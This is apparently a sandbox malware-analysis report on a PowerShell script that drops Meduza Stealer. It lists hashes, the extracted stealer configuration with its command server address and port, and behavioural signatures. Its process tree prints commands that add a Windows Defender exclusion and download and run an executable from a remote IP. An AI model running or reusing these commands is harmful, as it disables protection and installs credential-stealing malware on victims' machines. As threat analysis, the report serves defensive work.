Analysis
-
max time kernel
1s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-12-2024 07:28
Static task
static1
Behavioral task
behavioral1
Sample
script.ps1
Resource
win7-20240903-en
General
-
Target
script.ps1
-
Size
324B
-
MD5
129bf31d3dc155699387ccc33f2f3775
-
SHA1
1f43dcd5742a8f0b499892fd3e09255378817adc
-
SHA256
b1d2df274b2539ad80debafc925c0cf6a2c2394093e57a8e1d0023d3fc13dba3
-
SHA512
37f6f05e14cb7a78e7f245da4834b2be124e181c96c50a314dd29fc0c2b06c369b4510d068baf34495be5566e41a7d4852582643ce13beaded84720c3c3c9643
Malware Config
Extracted
meduza
193.3.19.151
-
anti_dbg
true
-
anti_vm
true
-
build_name
hdont
-
extensions
.txt
-
grabber_max_size
4.194304e+06
-
port
15666
-
self_destruct
false
Signatures
-
Meduza Stealer payload 1 IoCs
resource yara_rule behavioral2/files/0x000d000000023b64-93.dat family_meduza -
Meduza family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2992 powershell.exe -
pid Process 2992 powershell.exe 4676 powershell.exe 968 powershell.exe -
Downloads MZ/PE file
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 api.ipify.org 22 api.ipify.org -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2992 powershell.exe 2992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2992 powershell.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2992 -
C:\Windows\Temp\Launcher.exe"C:\Windows\Temp\Launcher.exe"2⤵PID:3488
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"3⤵
- Command and Scripting Interpreter: PowerShell
PID:968
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\ldgmp3gv.azx.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
PID:4676
-
-
C:\Windows\Temp\ldgmp3gv.azx.exe"C:\Windows\Temp\ldgmp3gv.azx.exe"3⤵PID:4344
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
1KB
MD574fd3bb20b5c047c4ef9ff119744dc1f
SHA126ffb8c890a071c7c73c7e90789c4f2f709ddb2d
SHA256950d6a3f91c5f3f823e14f14390f1ad57ddf504256262a778ca1ebe1fb91d2cf
SHA512f1600c164f93cafa4b0e393892b386bf0ef98939316aabf9a90106b8fa3116adae2745a0c8037e72532e2462b973cf8aabb89ceecf9c469d0a2b0a3194c9ae3e
-
Filesize
18KB
MD5f53e7d44fd375504202615c40b399ad2
SHA19804981227473a14dc93993ae0bacad01e1e16fb
SHA256e7c54c25f37cce1aeef177277ff2e1b1f24e640fced750c0c9c68f36405f551d
SHA5121d5efe2fdf8a9a3bee6a8b4ea859940a02c8f66ac93d724830fe0bb2091b19c2ecb8c51d1f982fcebd699da935f22b5777075102b6b9affa3533b795ba2b7274
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
201KB
MD52696d944ffbef69510b0c826446fd748
SHA1e4106861076981799719876019fe5224eac2655c
SHA256a4f53964cdddcccbd1b46da4d3f7f5f4292b5dd11c833d3db3a1e7def36da69a
SHA512c286bc2da757cbb2a28cf516a4a273dd11b15f674d5f698a713dc794f013b7502a8893ab6041e51bab3cdd506a18c415b9df8483b19e312f8fcb88923f42b8eb
-
Filesize
6KB
MD5e017be56699801dc89a8d6d1724eb633
SHA1a7f7aae4744210db8ebaf4da06c167357bc71eca
SHA256aa6b0863022bda1e0c263a75ae2896fe473d3bf57a76efc258b3afec8c157564
SHA5122368425dadc7f22eb11532359d4d1aa97bf3e381f4fd7b62c587e1f8819ef64a0ff7fc75cc5948939fadebc423345ab65a1cd2799bb4136fbea89d1f75dfc8c8
-
Filesize
1.2MB
MD5c6813da66eba357d0deaa48c2f7032b8
SHA16812e46c51f823ff0b0ee17bfce0af72f857af66
SHA2561420f60f053c3ea5605239ee431e5f487245108b1c01be75d16b5246156fa178
SHA51219391c6b12ba8f34a5faf326f8986ef8de4729d614d72bf438c6efa569b3505159ca55f580fe2a02642e5e7a0f1b38a7a9db9f0d66d67ba548d84c230183159e